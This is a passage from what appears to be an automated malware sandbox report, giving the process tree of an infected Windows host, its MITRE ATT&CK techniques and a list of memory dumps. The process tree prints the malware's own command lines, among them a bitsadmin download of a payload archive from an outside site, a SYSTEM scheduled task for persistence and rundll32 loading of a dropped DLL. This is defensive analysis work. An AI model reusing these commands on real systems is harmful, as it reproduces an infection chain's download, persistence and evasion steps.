        findstr /V /R "^auPnRNysIHbguzrrqNSScEBqzRPPbdMbFoQYCAfsPGuHOxFbthGdjTOOFOtZYdTsVqJXDtAAbBePnTjYkaLlJckLzezNcd$" Poi.vstm
        9⤵
        
        PID:2164
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com
        
        Fessura.exe.com Z
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2208
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com Z
        10⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        Suspicious behavior: MapViewOfSection
        
        PID:3508
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks.exe /create /tn "PjPVhJpbFf" /tr "C:\\Users\\Admin\\AppData\\Roaming\\cpyTzEXhxT\\PjPVhJpbFf.exe.com C:\\Users\\Admin\\AppData\\Roaming\\cpyTzEXhxT\\A" /sc onstart /F /RU SYSTEM
        11⤵
        Creates scheduled task(s)
        
        PID:3948
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
        11⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3748
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 30
        9⤵
        Runs ping.exe
        
        PID:2352
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
        7⤵
        
        PID:3044
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\l2civfm3.0fg\toolspab1.exe & exit
        5⤵
        
        PID:3912
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dc3aofq4.poq\005.exe & exit
        5⤵
        
        PID:1340
      - C:\Users\Admin\AppData\Local\Temp\dc3aofq4.poq\005.exe
        
        C:\Users\Admin\AppData\Local\Temp\dc3aofq4.poq\005.exe
        6⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:908
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rnj3hfb2.5vp\SunLabsPlayer.exe /S & exit
        5⤵
        
        PID:2248
      - C:\Users\Admin\AppData\Local\Temp\rnj3hfb2.5vp\SunLabsPlayer.exe
        
        C:\Users\Admin\AppData\Local\Temp\rnj3hfb2.5vp\SunLabsPlayer.exe /S
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:2308
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy6B24.tmp\tempfile.ps1"
        7⤵
        
        PID:2700
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy6B24.tmp\tempfile.ps1"
        7⤵
        Drops file in Program Files directory
        
        PID:3880
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy6B24.tmp\tempfile.ps1"
        7⤵
        
        PID:2116
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy6B24.tmp\tempfile.ps1"
        7⤵
        
        PID:3860
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy6B24.tmp\tempfile.ps1"
        7⤵
        
        PID:2392
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy6B24.tmp\tempfile.ps1"
        7⤵
        Drops file in Program Files directory
        
        PID:2596
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy6B24.tmp\tempfile.ps1"
        7⤵
        Checks for any installed AV software in registry
        
        PID:2624
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
        7⤵
        Download via BitsAdmin
        
        PID:2920
        
        C:\Program Files (x86)\lighteningplayer\data_load.exe
        
        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pYteES4lQZFgwzl9 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
        7⤵
        
        PID:7564
        
        C:\Program Files (x86)\lighteningplayer\data_load.exe
        
        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -psYh2fEpZVkJfYf1 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
        7⤵
        Executes dropped EXE
        
        PID:7596
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy6B24.tmp\tempfile.ps1"
        7⤵
        
        PID:7624
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy6B24.tmp\tempfile.ps1"
        7⤵
        
        PID:7712
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy6B24.tmp\tempfile.ps1"
        7⤵
        Drops file in Program Files directory
        
        PID:7796
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy6B24.tmp\tempfile.ps1"
        7⤵
        
        PID:7872
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy6B24.tmp\tempfile.ps1"
        7⤵
        
        PID:7948
        
        C:\Windows\SysWOW64\rundll32.exe
        
        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\NXfSHgjpzLhX\NXfSHgjpzLhX.dll" NXfSHgjpzLhX
        7⤵
        
        PID:8100
        
        C:\Windows\system32\rundll32.exe
        
        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\NXfSHgjpzLhX\NXfSHgjpzLhX.dll" NXfSHgjpzLhX
        8⤵
        Drops file in System32 directory
        
        PID:8108
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy6B24.tmp\tempfile.ps1"
        7⤵
        
        PID:8120
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy6B24.tmp\tempfile.ps1"
        7⤵
        
        PID:588
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy6B24.tmp\tempfile.ps1"
        7⤵
        
        PID:7400
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy6B24.tmp\tempfile.ps1"
        7⤵
        
        PID:7488
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy6B24.tmp\tempfile.ps1"
        7⤵
        
        PID:3696
        
        C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
        
        "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
        7⤵
        Executes dropped EXE
        
        PID:7572

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:2476
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 57FCC0248643C9BBC0A48103CFD9D0AA C
  2⤵
  - Loads dropped DLL
  PID:2844
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 2EDEC1F1A8DB818CB71CC1D7D038D9B6
  2⤵
  - Blocklisted process makes network request
  - Loads dropped DLL
  PID:2412
- - C:\Windows\SysWOW64\taskkill.exe
    "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
    3⤵
    - Kills process with taskkill
    PID:2524
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding B80E31A2D0525C4899F00596240029DF M Global\MSI0000
  2⤵
  - Loads dropped DLL
  PID:3128

C:\Windows\system32\taskeng.exe
taskeng.exe {BE0660F2-7C41-4129-AB8C-21D62879E32D} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Loads dropped DLL
PID:1764
- C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
  "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 115 -t 8080
  2⤵
  - Executes dropped EXE
  PID:3008
- C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
  "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 8080
  2⤵
  - Executes dropped EXE
  PID:3372
- C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
  "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 8080
  2⤵
  - Executes dropped EXE
  PID:3504
- C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
  "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 112 -t 8080
  2⤵
  - Executes dropped EXE
  PID:2764
- C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
  "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 8080
  2⤵
  - Executes dropped EXE
  PID:5252
- C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
  "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 8080
  2⤵
  - Executes dropped EXE
  PID:5656
- C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
  "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 8080
  2⤵
  - Executes dropped EXE
  PID:8040
- C:\Windows\system32\rundll32.exe
  C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\NXfSHgjpzLhX\NXfSHgjpzLhX.dll",NXfSHgjpzLhX
  2⤵
  - Windows security modification
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:5972

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "11977763161496192911-621325213911797087-674422888-17866845116014237792031603228"
1⤵
- Executes dropped EXE
PID:7564

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

BITS Jobs

T1197

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

BITS Jobs

T1197

Disabling Security Tools

T1089

Install Root Certificate

T1130

Modify Registry

T1112

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

Security Software Discovery

T1063

Software Discovery

T1518

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/112-145-0x0000000000230000-0x00000000002CD000-memory.dmp

Filesize
628KB

Download
memory/564-111-0x000007FEF2260000-0x000007FEF32F6000-memory.dmp

Filesize
16.6MB

Download
memory/564-112-0x0000000000C10000-0x0000000000C12000-memory.dmp

Filesize
8KB

Download
memory/564-119-0x0000000001270000-0x0000000001289000-memory.dmp

Filesize
100KB

Download
memory/564-120-0x0000000000C16000-0x0000000000C35000-memory.dmp

Filesize
124KB

Download
memory/564-121-0x0000000000C35000-0x0000000000C36000-memory.dmp

Filesize
4KB

Download
memory/588-300-0x0000000004910000-0x0000000004911000-memory.dmp

Filesize
4KB

Download
memory/588-301-0x0000000004912000-0x0000000004913000-memory.dmp

Filesize
4KB

Download
memory/748-93-0x0000000002020000-0x0000000002022000-memory.dmp

Filesize
8KB

Download
memory/908-214-0x0000000000240000-0x0000000000250000-memory.dmp

Filesize
64KB

Download
memory/908-215-0x00000000002F0000-0x0000000000302000-memory.dmp

Filesize
72KB

Download
memory/1032-79-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/1432-105-0x000007FEF2260000-0x000007FEF32F6000-memory.dmp

Filesize
16.6MB

Download
memory/1432-106-0x0000000002200000-0x0000000002202000-memory.dmp

Filesize
8KB

Download
memory/1432-116-0x0000000002206000-0x0000000002225000-memory.dmp

Filesize
124KB

Download
memory/1628-61-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/1628-60-0x0000000075551000-0x0000000075553000-memory.dmp

Filesize
8KB

Download
memory/1776-75-0x00000000002E0000-0x00000000002E2000-memory.dmp

Filesize
8KB

Download
memory/1932-94-0x0000000074871000-0x0000000074873000-memory.dmp

Filesize
8KB

Download
memory/1932-92-0x00000000001D0000-0x00000000001D1000-memory.dmp

Filesize
4KB

Download
memory/1992-114-0x000007FEFC031000-0x000007FEFC033000-memory.dmp

Filesize
8KB

Download
memory/2024-70-0x00000000003E0000-0x00000000003E1000-memory.dmp

Filesize
4KB

Download
memory/2116-271-0x0000000001D90000-0x00000000029DA000-memory.dmp

Filesize
12.3MB

Download
memory/2116-270-0x0000000001D90000-0x00000000029DA000-memory.dmp

Filesize
12.3MB

Download
memory/2392-277-0x00000000022F0000-0x0000000002F3A000-memory.dmp

Filesize
12.3MB

Download
memory/2392-276-0x00000000022F0000-0x0000000002F3A000-memory.dmp

Filesize
12.3MB

Download
memory/2596-279-0x0000000004880000-0x0000000004881000-memory.dmp

Filesize
4KB

Download
memory/2596-280-0x0000000004882000-0x0000000004883000-memory.dmp

Filesize
4KB

Download
memory/2624-282-0x0000000004A30000-0x0000000004A31000-memory.dmp

Filesize
4KB

Download
memory/2624-283-0x0000000004A32000-0x0000000004A33000-memory.dmp

Filesize
4KB

Download
memory/2700-260-0x0000000006650000-0x0000000006651000-memory.dmp

Filesize
4KB

Download
memory/2700-234-0x00000000047B2000-0x00000000047B3000-memory.dmp

Filesize
4KB

Download
memory/2700-243-0x000000007EF30000-0x000000007EF31000-memory.dmp

Filesize
4KB

Download
memory/2700-244-0x0000000006110000-0x0000000006111000-memory.dmp

Filesize
4KB

Download
memory/2700-237-0x0000000002590000-0x0000000002591000-memory.dmp

Filesize
4KB

Download
memory/2700-235-0x00000000047F0000-0x00000000047F1000-memory.dmp

Filesize
4KB

Download
memory/2700-249-0x0000000006150000-0x0000000006151000-memory.dmp

Filesize
4KB

Download
memory/2700-233-0x00000000023A0000-0x00000000023A1000-memory.dmp

Filesize
4KB

Download
memory/2700-232-0x00000000047B0000-0x00000000047B1000-memory.dmp

Filesize
4KB

Download
memory/2700-257-0x00000000063B0000-0x00000000063B1000-memory.dmp

Filesize
4KB

Download
memory/2700-238-0x00000000052E0000-0x00000000052E1000-memory.dmp

Filesize
4KB

Download
memory/2700-250-0x0000000006290000-0x0000000006291000-memory.dmp

Filesize
4KB

Download
memory/3508-285-0x0000000000240000-0x000000000026E000-memory.dmp

Filesize
184KB

Download
memory/3600-132-0x0000000000BB0000-0x0000000000BB2000-memory.dmp

Filesize
8KB

Download
memory/3600-127-0x000007FEF2260000-0x000007FEF32F6000-memory.dmp

Filesize
16.6MB

Download
memory/3696-307-0x000000001A964000-0x000000001A966000-memory.dmp

Filesize
8KB

Download
memory/3696-306-0x000000001A960000-0x000000001A962000-memory.dmp

Filesize
8KB

Download
memory/3748-287-0x00000000024C0000-0x00000000024C1000-memory.dmp

Filesize
4KB

Download
memory/3768-136-0x00000000001D0000-0x00000000001E0000-memory.dmp

Filesize
64KB

Download
memory/3768-137-0x0000000000280000-0x0000000000292000-memory.dmp

Filesize
72KB

Download
memory/3832-138-0x0000000001F40000-0x0000000001F41000-memory.dmp

Filesize
4KB

Download
memory/3860-273-0x0000000002150000-0x0000000002D9A000-memory.dmp

Filesize
12.3MB

Download
memory/3880-267-0x0000000002090000-0x0000000002CDA000-memory.dmp

Filesize
12.3MB

Download
memory/3880-268-0x0000000002090000-0x0000000002CDA000-memory.dmp

Filesize
12.3MB

Download
memory/3880-266-0x0000000002680000-0x0000000002681000-memory.dmp

Filesize
4KB

Download
memory/3880-265-0x0000000004940000-0x0000000004941000-memory.dmp

Filesize
4KB

Download
memory/3880-264-0x00000000023D0000-0x00000000023D1000-memory.dmp

Filesize
4KB

Download
memory/7400-303-0x0000000004A92000-0x0000000004A93000-memory.dmp

Filesize
4KB

Download
memory/7400-302-0x0000000004A90000-0x0000000004A91000-memory.dmp

Filesize
4KB

Download
memory/7488-305-0x000000001AC04000-0x000000001AC06000-memory.dmp

Filesize
8KB

Download
memory/7488-304-0x000000001AC00000-0x000000001AC02000-memory.dmp

Filesize
8KB

Download
memory/7572-308-0x0000000000400000-0x000000000043E000-memory.dmp

Filesize
248KB

Download
memory/7624-288-0x0000000004A20000-0x0000000004A21000-memory.dmp

Filesize
4KB

Download
memory/7624-289-0x0000000004A22000-0x0000000004A23000-memory.dmp

Filesize
4KB

Download
memory/7712-291-0x00000000049D2000-0x00000000049D3000-memory.dmp

Filesize
4KB

Download
memory/7712-290-0x00000000049D0000-0x00000000049D1000-memory.dmp

Filesize
4KB

Download
memory/7796-293-0x00000000049E2000-0x00000000049E3000-memory.dmp

Filesize
4KB

Download
memory/7796-292-0x00000000049E0000-0x00000000049E1000-memory.dmp

Filesize
4KB

Download
memory/7872-294-0x0000000001050000-0x0000000001051000-memory.dmp

Filesize
4KB

Download
memory/7872-295-0x0000000001052000-0x0000000001053000-memory.dmp

Filesize
4KB

Download
memory/7948-297-0x0000000002750000-0x000000000339A000-memory.dmp

Filesize
12.3MB

Download
memory/7948-296-0x0000000002750000-0x000000000339A000-memory.dmp

Filesize
12.3MB

Download
memory/8120-298-0x0000000004A30000-0x0000000004A31000-memory.dmp

Filesize
4KB

Download
memory/8120-299-0x0000000004A32000-0x0000000004A33000-memory.dmp

Filesize
4KB

Download